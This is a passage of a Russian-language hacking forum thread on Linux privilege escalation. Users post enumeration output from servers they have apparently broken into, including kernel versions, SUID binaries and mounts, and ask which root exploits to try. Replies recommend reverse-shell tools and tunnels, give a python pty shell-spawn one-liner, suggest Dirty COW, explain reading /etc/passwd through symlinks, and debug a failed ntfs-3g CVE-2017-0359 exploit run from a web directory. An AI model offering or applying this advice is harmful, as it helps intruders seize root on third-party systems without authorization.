Повышение прав [задай вопрос - получи ответ]

Discussion in 'Уязвимости' started by Expl0ited, 1 Oct 2011.

  1. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    912
    Likes Received:
    474
    Reputations:
    723
    Бэк возможен при прямом доступе к реверс-серверу напрямую. VPN роли не играет. Возможно использование туннелей, популярный сервис: https://ngrok.com/
    Биндить порт нужно для какого-нибудь листенера. Обычно используются популярные шеллкоды, в которых идет проброс в cmd и прочую нечисть. Удобные инструменты: netcat, socat.
    бинарный шелл - это что-то смешное, так не говорят. Поднять можно что угодно.
    Какой листенер, таким клиентом и подключаться. Забиндил на vnc - подключайся vnc клиентом.

    Там ничего не отключили.
    spawn через python:
    Code:
    python -c 'import pty; pty.spawn("/bin/sh")'
     
    _________________________
    man474019, ACat and Gorev like this.
  2. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    Спасибо!
    Сейчас нет возможности, но в ближайшем времени доберусь до сервера и попробую, как Вы посоветовали. Отпишусь в этом посте.


    Фак май моск, сработало!!!
    Вы красава, Вам плюсик :3
     
    #642 ACat, 16 Mar 2017
    Last edited: 17 Mar 2017
  3. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    358
    Likes Received:
    313
    Reputations:
    163
    Парни, подскажите что можно попробовать.

    uname -a
    Code:
    Linux web1 2.6.32-26-pve #1 SMP Mon Oct 14 08:22:20 CEST 2013 i686 GNU/Linux
    
    ls -la /boot
    Code:
    drwxr-xr-x  2 root root   4096 Jan  9  2010 .
    drwxr-xr-x 20 root root   4096 Aug  7  2016 ..
    -rw-r--r--  1 root root 103204 Sep 28  2007 memtest86+.bin
    
    ls -la --full-time /lib
    Code:
    drwxr-xr-x 13 root root    4096 2012-12-17 17:33:14.000000000 +0100 .
    drwxr-xr-x 20 root root    4096 2016-08-07 20:50:02.414264805 +0200 ..
    lrwxrwxrwx  1 root root      21 2010-03-02 18:37:34.000000000 +0100 cpp -> /etc/
    alternatives/cpp
    drwxr-xr-x  2 root root    4096 2011-08-22 15:45:21.000000000 +0200 dhcp3-client
    
    drwxr-xr-x  2 root root    4096 2009-04-14 23:44:58.000000000 +0200 firmware
    drwxr-xr-x  2 root root    4096 2009-08-18 02:49:39.000000000 +0200 i486-linux-g
    nu
    drwxr-xr-x  2 root root    4096 2016-05-29 18:40:22.466740561 +0200 init
    drwxr-xr-x  2 root root    4096 2010-01-09 18:03:47.000000000 +0100 iptables
    -rwxr-xr-x  1 root root   64612 2010-01-20 10:21:10.000000000 +0100 klibc-B9LS-G
    jx2D7BYcbQig0RlgHKO9Y.so
    -rwxr-xr-x  1 root root  109152 2012-12-15 20:01:15.000000000 +0100 ld-2.7.so
    lrwxrwxrwx  1 root root       9 2012-12-17 17:33:13.000000000 +0100 ld-linux.so.
    2 -> ld-2.7.so
    -rw-r--r--  1 root root    5440 2012-12-15 20:01:15.000000000 +0100 libBrokenLoc
    ale-2.7.so
    lrwxrwxrwx  1 root root      22 2012-12-17 17:33:13.000000000 +0100 libBrokenLoc
    ale.so.1 -> libBrokenLocale-2.7.so
    -rw-r--r--  1 root root   13696 2012-12-15 20:01:15.000000000 +0100 libSegFault.
    so
    lrwxrwxrwx  1 root root      15 2010-03-02 18:37:33.000000000 +0100 libacl.so.1
    -> libacl.so.1.1.0
    -rw-r--r--  1 root root   22544 2007-11-14 11:59:18.000000000 +0100 libacl.so.1.
    1.0
    -rw-r--r--  1 root root    9804 2012-12-15 20:01:15.000000000 +0100 libanl-2.7.s
    o
    lrwxrwxrwx  1 root root      13 2012-12-17 17:33:13.000000000 +0100 libanl.so.1
    -> libanl-2.7.so
    lrwxrwxrwx  1 root root      15 2010-03-02 18:37:33.000000000 +0100 libatm.so.1
    -> libatm.so.1.0.0
    -rw-r--r--  1 root root   32224 2007-08-14 22:27:59.000000000 +0200 libatm.so.1.
    0.0
    lrwxrwxrwx  1 root root      16 2010-03-02 18:37:33.000000000 +0100 libattr.so.1
     -> libattr.so.1.1.0
    -rw-r--r--  1 root root   13592 2007-10-31 23:45:11.000000000 +0100 libattr.so.1
    .1.0
    lrwxrwxrwx  1 root root      15 2010-03-02 18:37:33.000000000 +0100 libblkid.so.
    1 -> libblkid.so.1.0
    -rw-r--r--  1 root root   36964 2008-03-27 18:25:48.000000000 +0100 libblkid.so.
    1.0
    lrwxrwxrwx  1 root root      15 2011-12-29 11:24:57.000000000 +0100 libbz2.so.1
    -> libbz2.so.1.0.4
    lrwxrwxrwx  1 root root      15 2011-12-29 11:24:57.000000000 +0100 libbz2.so.1.
    0 -> libbz2.so.1.0.4
    -rw-r--r--  1 root root   66276 2011-12-12 23:40:54.000000000 +0100 libbz2.so.1.
    0.4
    -rwxr-xr-x  1 root root 1294572 2012-12-15 20:01:15.000000000 +0100 libc-2.7.so
    lrwxrwxrwx  1 root root      11 2012-12-17 17:33:13.000000000 +0100 libc.so.6 ->
     libc-2.7.so
    lrwxrwxrwx  1 root root      14 2010-03-02 18:37:33.000000000 +0100 libcap.so.1
    -> libcap.so.1.10
    -rw-r--r--  1 root root   10316 2007-07-31 21:20:19.000000000 +0200 libcap.so.1.
    10
    lrwxrwxrwx  1 root root      17 2010-03-02 18:37:33.000000000 +0100 libcfont.so.
    0 -> libcfont.so.0.0.0
    -rw-r--r--  1 root root   11512 2008-02-06 23:49:54.000000000 +0100 libcfont.so.
    0.0.0
    -rw-r--r--  1 root root  181724 2012-12-15 20:01:15.000000000 +0100 libcidn-2.7.
    so
    lrwxrwxrwx  1 root root      14 2012-12-17 17:33:13.000000000 +0100 libcidn.so.1
     -> libcidn-2.7.so
    lrwxrwxrwx  1 root root      17 2010-03-02 18:37:32.000000000 +0100 libcom_err.s
    o.2 -> libcom_err.so.2.1
    -rw-r--r--  1 root root    7444 2008-03-27 18:25:48.000000000 +0100 libcom_err.s
    o.2.1
    lrwxrwxrwx  1 root root      19 2010-03-02 18:37:33.000000000 +0100 libconsole.s
    o.0 -> libconsole.so.0.0.0
    -rw-r--r--  1 root root   73312 2008-02-06 23:49:54.000000000 +0100 libconsole.s
    o.0.0.0
    -rw-r--r--  1 root root   38300 2012-12-15 20:01:15.000000000 +0100 libcrypt-2.7
    .so
    lrwxrwxrwx  1 root root      15 2012-12-17 17:33:13.000000000 +0100 libcrypt.so.
    1 -> libcrypt-2.7.so
    lrwxrwxrwx  1 root root      19 2010-03-02 18:37:32.000000000 +0100 libctutils.s
    o.0 -> libctutils.so.0.0.0
    -rw-r--r--  1 root root   17424 2008-02-06 23:49:54.000000000 +0100 libctutils.s
    o.0.0.0
    -rw-r--r--  1 root root   85108 2007-12-12 20:25:16.000000000 +0100 libdevmapper
    .so.1.02.1
    -rw-r--r--  1 root root    9684 2012-12-15 20:01:15.000000000 +0100 libdl-2.7.so
    
    lrwxrwxrwx  1 root root      12 2012-12-17 17:33:13.000000000 +0100 libdl.so.2 -
    > libdl-2.7.so
    lrwxrwxrwx  1 root root      13 2010-03-02 18:37:32.000000000 +0100 libe2p.so.2
    -> libe2p.so.2.3
    -rw-r--r--  1 root root   20052 2008-03-27 18:25:48.000000000 +0100 libe2p.so.2.
    3
    lrwxrwxrwx  1 root root      16 2010-03-02 18:37:33.000000000 +0100 libext2fs.so
    .2 -> libext2fs.so.2.4
    -rw-r--r--  1 root root  142792 2008-03-27 18:25:48.000000000 +0100 libext2fs.so
    .2.4
    lrwxrwxrwx  1 root root      16 2011-03-03 13:04:15.000000000 +0100 libfuse.so.2
     -> libfuse.so.2.7.2
    -rw-r--r--  1 root root  102816 2011-02-11 21:45:09.000000000 +0100 libfuse.so.2
    .7.2
    -rw-r--r--  1 root root   42700 2009-02-19 11:39:17.000000000 +0100 libgcc_s.so.
    1
    lrwxrwxrwx  1 root root      19 2010-03-02 18:37:32.000000000 +0100 libgcrypt.so
    .11 -> libgcrypt.so.11.2.3
    -rw-r--r--  1 root root  310956 2007-12-07 12:34:06.000000000 +0100 libgcrypt.so
    .11.2.3
    lrwxrwxrwx  1 root root      21 2010-03-02 18:37:33.000000000 +0100 libgpg-error
    .so.0 -> libgpg-error.so.0.3.0
    -rw-r--r--  1 root root   11468 2007-11-16 01:56:41.000000000 +0100 libgpg-error
    .so.0.3.0
    lrwxrwxrwx  1 root root      17 2010-03-02 18:37:33.000000000 +0100 libhistory.s
    o.5 -> libhistory.so.5.2
    -rw-r--r--  1 root root   27188 2007-10-02 16:35:06.000000000 +0200 libhistory.s
    o.5.2
    -rw-r--r--  1 root root   27444 2007-12-21 15:36:58.000000000 +0100 libiw.so.29
    -rw-r--r--  1 root root    5644 2007-10-24 04:37:31.000000000 +0200 libkeyutils-
    1.2.so
    lrwxrwxrwx  1 root root      18 2010-03-02 18:37:32.000000000 +0100 libkeyutils.
    so.1 -> libkeyutils-1.2.so
    -rw-r--r--  1 root root  145232 2012-12-15 20:01:15.000000000 +0100 libm-2.7.so
    lrwxrwxrwx  1 root root      11 2012-12-17 17:33:13.000000000 +0100 libm.so.6 ->
     libm-2.7.so
    -rw-r--r--  1 root root   13696 2012-12-15 20:01:15.000000000 +0100 libmemusage.
    so
    lrwxrwxrwx  1 root root      17 2010-03-02 18:37:32.000000000 +0100 libncurses.s
    o.5 -> libncurses.so.5.6
    -rw-r--r--  1 root root  190584 2008-02-24 00:38:14.000000000 +0100 libncurses.s
    o.5.6
    lrwxrwxrwx  1 root root      18 2010-03-02 18:37:32.000000000 +0100 libncursesw.
    so.5 -> libncursesw.so.5.6
    -rw-r--r--  1 root root  236568 2008-02-24 00:38:14.000000000 +0100 libncursesw.
    so.5.6
    -rw-r--r--  1 root root   79612 2012-12-15 20:01:15.000000000 +0100 libnsl-2.7.s
    o
    lrwxrwxrwx  1 root root      13 2012-12-17 17:33:13.000000000 +0100 libnsl.so.1
    -> libnsl-2.7.so
    -rw-r--r--  1 root root   26340 2012-12-15 20:01:15.000000000 +0100 libnss_compa
    t-2.7.so
    lrwxrwxrwx  1 root root      20 2012-12-17 17:33:13.000000000 +0100 libnss_compa
    t.so.2 -> libnss_compat-2.7.so
    -rw-r--r--  1 root root   17884 2012-12-15 20:01:15.000000000 +0100 libnss_dns-2
    .7.so
    lrwxrwxrwx  1 root root      17 2012-12-17 17:33:13.000000000 +0100 libnss_dns.s
    o.2 -> libnss_dns-2.7.so
    -rw-r--r--  1 root root   38412 2012-12-15 20:01:15.000000000 +0100 libnss_files
    -2.7.so
    lrwxrwxrwx  1 root root      19 2012-12-17 17:33:13.000000000 +0100 libnss_files
    .so.2 -> libnss_files-2.7.so
    -rw-r--r--  1 root root   17900 2012-12-15 20:01:15.000000000 +0100 libnss_hesio
    d-2.7.so
    lrwxrwxrwx  1 root root      20 2012-12-17 17:33:13.000000000 +0100 libnss_hesio
    d.so.2 -> libnss_hesiod-2.7.so
    -rw-r--r--  1 root root   34352 2012-12-15 20:01:15.000000000 +0100 libnss_nis-2
    .7.so
    lrwxrwxrwx  1 root root      17 2012-12-17 17:33:13.000000000 +0100 libnss_nis.s
    o.2 -> libnss_nis-2.7.so
    -rw-r--r--  1 root root   42508 2012-12-15 20:01:15.000000000 +0100 libnss_nispl
    us-2.7.so
    lrwxrwxrwx  1 root root      21 2012-12-17 17:33:13.000000000 +0100 libnss_nispl
    us.so.2 -> libnss_nisplus-2.7.so
    lrwxrwxrwx  1 root root      20 2010-03-02 18:37:32.000000000 +0100 libntfs-3g.s
    o.23 -> libntfs-3g.so.23.0.0
    -rw-r--r--  1 root root  182804 2008-07-10 12:19:22.000000000 +0200 libntfs-3g.s
    o.23.0.0
    lrwxrwxrwx  1 root root      16 2011-11-10 22:29:24.000000000 +0100 libpam.so.0
    -> libpam.so.0.81.6
    -rw-r--r--  1 root root   37956 2011-10-18 17:37:36.000000000 +0200 libpam.so.0.
    81.6
    lrwxrwxrwx  1 root root      21 2011-11-10 22:29:24.000000000 +0100 libpam_misc.
    so.0 -> libpam_misc.so.0.81.2
    -rw-r--r--  1 root root    8520 2011-10-18 17:37:36.000000000 +0200 libpam_misc.
    so.0.81.2
    lrwxrwxrwx  1 root root      17 2011-11-10 22:29:24.000000000 +0100 libpamc.so.0
     -> libpamc.so.0.81.0
    -rw-r--r--  1 root root    9028 2011-10-18 17:37:36.000000000 +0200 libpamc.so.0
    .81.0
    lrwxrwxrwx  1 root root      22 2010-03-02 18:37:33.000000000 +0100 libparted-1.
    7.so.1 -> libparted-1.7.so.1.0.0
    -rw-r--r--  1 root root  388784 2009-06-05 11:42:39.000000000 +0200 libparted-1.
    7.so.1.0.0
    -rw-r--r--  1 root root    5444 2012-12-15 20:01:15.000000000 +0100 libpcprofile
    .so
    lrwxrwxrwx  1 root root      16 2010-03-02 18:37:33.000000000 +0100 libpopt.so.0
     -> libpopt.so.0.0.0
    -rw-r--r--  1 root root   27144 2007-03-07 22:46:19.000000000 +0100 libpopt.so.0
    .0.0
    -rw-r--r--  1 root root   49096 2008-07-10 11:28:34.000000000 +0200 libproc-3.2.
    7.so
    -rwxr-xr-x  1 root root  112174 2012-12-15 20:01:20.000000000 +0100 libpthread-2
    .7.so
    lrwxrwxrwx  1 root root      17 2012-12-17 17:33:13.000000000 +0100 libpthread.s
    o.0 -> libpthread-2.7.so
    lrwxrwxrwx  1 root root      18 2010-03-02 18:37:33.000000000 +0100 libreadline.
    so.5 -> libreadline.so.5.2
    -rw-r--r--  1 root root  196560 2007-10-02 16:35:06.000000000 +0200 libreadline.
    so.5.2
    -rw-r--r--  1 root root   59216 2012-12-15 20:01:15.000000000 +0100 libresolv-2.
    7.so
    lrwxrwxrwx  1 root root      16 2012-12-17 17:33:13.000000000 +0100 libresolv.so
    .2 -> libresolv-2.7.so
    -rw-r--r--  1 root root   30624 2012-12-15 20:01:15.000000000 +0100 librt-2.7.so
    
    lrwxrwxrwx  1 root root      12 2012-12-17 17:33:13.000000000 +0100 librt.so.1 -
    > librt-2.7.so
    -rw-r--r--  1 root root   95948 2008-02-29 23:29:19.000000000 +0100 libselinux.s
    o.1
    -rw-r--r--  1 root root  207284 2008-03-01 06:21:06.000000000 +0100 libsepol.so.
    1
    lrwxrwxrwx  1 root root      17 2010-03-02 18:37:32.000000000 +0100 libslang.so.
    2 -> libslang.so.2.1.3
    -rw-r--r--  1 root root  686384 2007-11-28 14:54:47.000000000 +0100 libslang.so.
    2.1.3
    lrwxrwxrwx  1 root root      12 2010-03-02 18:37:33.000000000 +0100 libss.so.2 -
    > libss.so.2.0
    -rw-r--r--  1 root root   18648 2008-03-27 18:25:48.000000000 +0100 libss.so.2.0
    
    lrwxrwxrwx  1 root root      17 2010-03-02 18:37:33.000000000 +0100 libsysfs.so.
    2 -> libsysfs.so.2.0.1
    -rw-r--r--  1 root root   37784 2008-04-01 19:03:20.000000000 +0200 libsysfs.so.
    2.0.1
    -rw-r--r--  1 root root   26284 2012-12-15 20:01:15.000000000 +0100 libthread_db
    -1.0.so
    lrwxrwxrwx  1 root root      19 2012-12-17 17:33:13.000000000 +0100 libthread_db
    .so.1 -> libthread_db-1.0.so
    lrwxrwxrwx  1 root root      13 2010-03-02 18:37:32.000000000 +0100 libtic.so.5
    -> libtic.so.5.6
    -rw-r--r--  1 root root   69952 2008-02-24 00:38:14.000000000 +0100 libtic.so.5.
    6
    lrwxrwxrwx  1 root root      14 2010-03-02 18:37:32.000000000 +0100 libticw.so.5
     -> libticw.so.5.6
    -rw-r--r--  1 root root   69952 2008-02-24 00:38:14.000000000 +0100 libticw.so.5
    .6
    lrwxrwxrwx  1 root root      20 2011-03-03 13:04:15.000000000 +0100 libulockmgr.
    so.1 -> libulockmgr.so.1.0.1
    -rw-r--r--  1 root root    7836 2011-02-11 21:45:09.000000000 +0100 libulockmgr.
    so.1.0.1
    lrwxrwxrwx  1 root root      19 2010-03-02 18:37:33.000000000 +0100 libusb-0.1.s
    o.4 -> libusb-0.1.so.4.4.4
    -rw-r--r--  1 root root   29056 2007-11-23 10:47:27.000000000 +0100 libusb-0.1.s
    o.4.4.4
    -rw-r--r--  1 root root    9696 2012-12-15 20:01:15.000000000 +0100 libutil-2.7.
    so
    lrwxrwxrwx  1 root root      14 2012-12-17 17:33:13.000000000 +0100 libutil.so.1
     -> libutil-2.7.so
    lrwxrwxrwx  1 root root      14 2010-03-02 18:37:33.000000000 +0100 libuuid.so.1
     -> libuuid.so.1.2
    -rw-r--r--  1 root root   13188 2008-03-27 18:25:48.000000000 +0100 libuuid.so.1
    .2
    lrwxrwxrwx  1 root root      22 2010-03-02 18:37:32.000000000 +0100 libvolume_id
    .so.0 -> libvolume_id.so.0.81.0
    -rw-r--r--  1 root root   27864 2009-04-14 23:45:06.000000000 +0200 libvolume_id
    .so.0.81.0
    lrwxrwxrwx  1 root root      16 2010-03-02 18:37:33.000000000 +0100 libwrap.so.0
     -> libwrap.so.0.7.6
    -rw-r--r--  1 root root   31304 2007-07-30 10:19:43.000000000 +0200 libwrap.so.0
    .7.6
    drwxr-xr-x  2 root root    4096 2010-01-09 18:01:57.000000000 +0100 lsb
    drwxr-xr-x  2 root root    4096 2008-10-06 14:51:29.000000000 +0200 modules
    drwxr-xr-x  2 root root    4096 2011-11-10 22:29:15.000000000 +0100 security
    drwxr-xr-x 15 root root    4096 2008-02-24 00:38:00.000000000 +0100 terminfo
    drwxr-xr-x  3 root root    4096 2010-01-09 18:02:34.000000000 +0100 tls
    drwxr-xr-x  3 root root    4096 2011-01-21 16:23:48.000000000 +0100 udev
    
    
    mount
    Code:
    /dev/simfs on / type simfs (rw,relatime)
    /dev/mapper/pve-web1home on /home type ext4 (rw,noatime,relatime,barrier=1,data=
    ordered)
    proc on /proc type proc (rw,relatime)
    sysfs on /sys type sysfs (rw,relatime)
    tmpfs on /var/run type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)
    tmpfs on /var/lock type tmpfs (rw,nosuid,nodev,noexec,relatime)
    tmpfs on /dev/shm type tmpfs (rw,relatime)
    devpts on /dev/pts type devpts (rw,relatime,gid=5,mode=620,ptmxmode=000)
    tmpfs on /var/run type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)
    tmpfs on /var/lock type tmpfs (rw,nosuid,nodev,noexec,relatime)
    
    cat /etc/issue
    Code:
    Ubuntu 8.04.4 LTS \n \l
    
    cat /etc/crontab
    Code:
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user  command
    50 * * * * root    cd / && run-parts --report /etc/cron.hourly
    25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/c
    ron.daily )
    47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/c
    ron.weekly )
    52 6 15 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/
    cron.monthly )
    
    cat /proc/version
    Code:
    Linux version 2.6.32-26-pve (root@lola) (gcc version 4.7.2 (Debian 4.7.2-5) ) #1
    SMP Mon Oct 14 08:22:20 CEST 2013
    
    cat /proc/sys/vm/mmap_min_addr
    Code:
    4096
    
    ls -la /usr/bin/staprun
    Code:
    ls: cannot access /usr/bin/staprun: No such file or directory
    
    find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    Code:
    -rwsr-xr-x 1 root root 9624 Dec 15  2012 /usr/lib/pt_chown
    -rwsr-xr-- 1 root messagebus 228628 Oct  3  2012 /usr/lib/dbus-1.0/dbus-daemon-l
    aunch-helper
    -rwsr-xr-x 1 root root 4588 Aug 23  2008 /usr/lib/eject/dmcrypt-get-device
    -rwsr-xr-- 1 root www-data 10276 Mar  8  2013 /usr/lib/apache2/suexec
    -rwsr-xr-x 1 root root 168340 Mar  8  2011 /usr/lib/openssh/ssh-keysign
    -rwsr-sr-x 1 libuuid libuuid 12336 Mar 27  2008 /usr/sbin/uuidd
    -rwsr-xr-x 2 root root 108068 Feb 27  2013 /usr/bin/sudoedit
    -rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr
    -rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
    -rwsr-xr-x 2 root root 108068 Feb 27  2013 /usr/bin/sudo
    -rwsr-xr-x 1 root root 37360 Dec  8  2008 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 12296 Dec 10  2007 /usr/bin/traceroute6.iputils
    -rwsr-xr-x 1 root root 11048 Dec 10  2007 /usr/bin/arping
    -rwsr-xr-x 1 root root 23952 Dec  8  2008 /usr/bin/chsh
    -rwsr-xr-x 1 root root 28624 Dec  8  2008 /usr/bin/chfn
    -rwsr-sr-x 1 daemon daemon 38464 Feb 20  2007 /usr/bin/at
    -rwsr-xr-x 1 root root 19144 Dec  8  2008 /usr/bin/newgrp
    -rwsr-xr-x 1 root root 29104 Dec  8  2008 /usr/bin/passwd
    
     
  4. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
     
  5. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    dirty c0w
     
  6. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    парни, поясните пожалуйста, как работает сплоит, и почему он у меня не работает?
    http://0day.today/exploit/26893

    Code:
    /bin/bash ./d9.sh
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @  CVE-2017-0359, PoC by Kristian Erik Hermansen  @
    @  ntfs-3g local privilege escalation to root     @
    @  Credits to Google Project Zero                 @
    @  Affects: Debian 9/8/7, Ubuntu, Gentoo, others  @
    @  Tested: Debian 9 (Stretch)                     @
    @  Date: 2017-02-03                               @
    @  Link: https://goo.gl/A9I8Vq                    @
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    [*] Gathering environment info ...
    [*] Creating kernel hijack directories ...
    [*] Forging symlinks ...
    ln: failed to create symbolic link `/var/www/alfavito/modules/template/templates/lib/modules\r/2.6.32-openvz-042stab120.16-amd64\r\r': No such file or directory
    ln: failed to create symbolic link `/var/www/alfavito/modules/template/templates/kernel/fs\r/fuse\r': No such file or directory
    [*] Pulling in deps ...
    [*] Building kernel module ...
    ./d9.sh: line 25: $'\r': command not found
    ./d9.sh: line 64: warning: here-document at line 26 delimited by end-of-file (wanted `EOF')
    
     
  7. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    529
    Likes Received:
    497
    Reputations:
    154
    Судя по логу сплоит создает так называемые именованные ссылки (symlink). Это большая уязвимость в юникс системах, так как ссылка создана пользователем и сответственно есть права её читать. Помню был сценарий атаки когда с помощью rsync'a мы заливали ссылку и читали файлы конфига веб сервера и прочее. ln -s /etc/passwd /asd потом просто читаешь cat asd - таким образом часто байпассятся привелегии и есть возможность читать файлы за пределами допустимой диры. А ошибка простая, пытается создать ссылку на несуществующий файл.
     
    _________________________
    ACat likes this.
  8. madik

    madik Member

    Joined:
    4 May 2017
    Messages:
    244
    Likes Received:
    84
    Reputations:
    6
    есть физический доступ к машине win10 пользователь юзер возможности вставить диск или флешку нету
     
  9. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    Сэр, а как проверить сервер на уязвимость последним векторам атак?
     
  10. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    529
    Likes Received:
    497
    Reputations:
    154
    Для unix систем есть шикарный скрипт

    UPD: А так пробовать их все.
     
    _________________________
    man474019 and ACat like this.
  11. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    uname -a
    Code:
    Linux winetime.ellyt.com 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64 GNU/Linux
    
    sh-4.3$ ls -la /boot
    Code:
    total 20512
    drwxr-xr-x  3 root root  4096 Jun  1 08:25 .
    drwxr-xr-x 23 root root  4096 Jun  1 09:11 ..
    -rw-r--r--  1 root root  2681172 Mar  8 01:59 System.map-3.16.0-4-amd64
    -rw-r--r--  1 root root  157815 Mar  8 01:59 config-3.16.0-4-amd64
    drwxr-xr-x  5 root root  4096 Apr  6 11:52 grub
    -rw-r--r--  1 root root 15017568 Jun  1 08:25 initrd.img-3.16.0-4-amd64
    -rw-r--r--  1 root root  3128784 Mar  8 01:58 vmlinuz-3.16.0-4-amd64
    
    ls -la --full-time /lib
    Code:
    total 280
    drwxr-xr-x 16 root root  4096 2017-06-01 08:24:38.147095248 +0300 .
    drwxr-xr-x 23 root root  4096 2017-06-01 09:11:13.863704998 +0300 ..
    lrwxrwxrwx  1 root root  21 2017-04-07 21:12:08.155124000 +0300 cpp -> /etc/alternatives/cpp
    drwxr-xr-x  2 root root  4096 2017-04-06 11:11:32.822435000 +0300 discover
    drwxr-xr-x  2 root root  4096 2017-04-06 11:08:06.370435000 +0300 ifupdown
    drwxr-xr-x  2 root root  4096 2017-04-06 11:07:50.358435000 +0300 init
    -rwxr-xr-x  1 root root 71416 2014-10-05 04:01:50.000000000 +0300 klibc-IpHGKKbZiB_yZ7GPagmQz2GwVAQ.so
    lrwxrwxrwx  1 root root  17 2014-11-08 19:03:39.000000000 +0200 libip4tc.so.0 -> libip4tc.so.0.1.0
    -rw-r--r--  1 root root 31416 2014-11-08 19:03:41.000000000 +0200 libip4tc.so.0.1.0
    lrwxrwxrwx  1 root root  17 2014-11-08 19:03:39.000000000 +0200 libip6tc.so.0 -> libip6tc.so.0.1.0
    -rw-r--r--  1 root root 31416 2014-11-08 19:03:41.000000000 +0200 libip6tc.so.0.1.0
    lrwxrwxrwx  1 root root  15 2014-11-08 19:03:39.000000000 +0200 libipq.so.0 -> libipq.so.0.0.0
    -rw-r--r--  1 root root 10544 2014-11-08 19:03:41.000000000 +0200 libipq.so.0.0.0
    lrwxrwxrwx  1 root root  16 2014-11-08 19:03:39.000000000 +0200 libiptc.so.0 -> libiptc.so.0.0.0
    -rw-r--r--  1 root root  5816 2014-11-08 19:03:41.000000000 +0200 libiptc.so.0.0.0
    lrwxrwxrwx  1 root root  20 2014-11-08 19:03:39.000000000 +0200 libxtables.so.10 -> libxtables.so.10.0.0
    -rw-r--r--  1 root root 51896 2014-11-08 19:03:42.000000000 +0200 libxtables.so.10.0.0
    drwxr-xr-x  3 root root  4096 2017-04-06 11:07:50.206435000 +0300 lsb
    drwxr-xr-x  2 root root  4096 2017-04-06 11:08:07.734435000 +0300 modprobe.d
    drwxr-xr-x  3 root root  4096 2017-04-06 11:08:31.846435000 +0300 modules
    drwxr-xr-x  2 root root  4096 2017-06-01 08:24:38.227099822 +0300 modules-load.d
    drwxr-xr-x  2 root root  4096 2017-04-06 11:07:50.270435000 +0300 startpar
    drwxr-xr-x  8 root root  4096 2017-04-06 11:07:55.662435000 +0300 systemd
    drwxr-xr-x 15 root root  4096 2017-04-06 11:07:27.242435000 +0300 terminfo
    drwxr-xr-x  4 root root  4096 2017-04-06 11:08:00.966435000 +0300 udev
    drwxr-xr-x  2 root root  4096 2017-04-22 18:39:02.116227245 +0300 ufw
    drwxr-xr-x  4 root root 12288 2017-06-01 08:24:52.967942493 +0300 x86_64-linux-gnu
    drwxr-xr-x  2 root root  4096 2017-04-06 11:08:07.490435000 +0300 xtables
    
    ls -la --full-time /lib64
    Code:
    total 8
    drwxr-xr-x  2 root root 4096 2017-04-06 11:07:37.814435000 +0300 .
    drwxr-xr-x 23 root root 4096 2017-06-01 09:11:13.863704998 +0300 ..
    lrwxrwxrwx  1 root root  32 2016-11-28 06:26:42.000000000 +0200 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.19.so
    
    mount
    Code:
    sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)  
    proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)  
    udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=255197,mode=755)  
    devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)  
    tmpfs on /run type tmpfs (rw,nosuid,relatime,size=411712k,mode=755)  
    /dev/sda2 on / type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)  
    securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)  
    tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)  
    tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)  
    tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)  
    cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)  
    pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)  
    cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)  
    cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
    cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
    cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
    cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
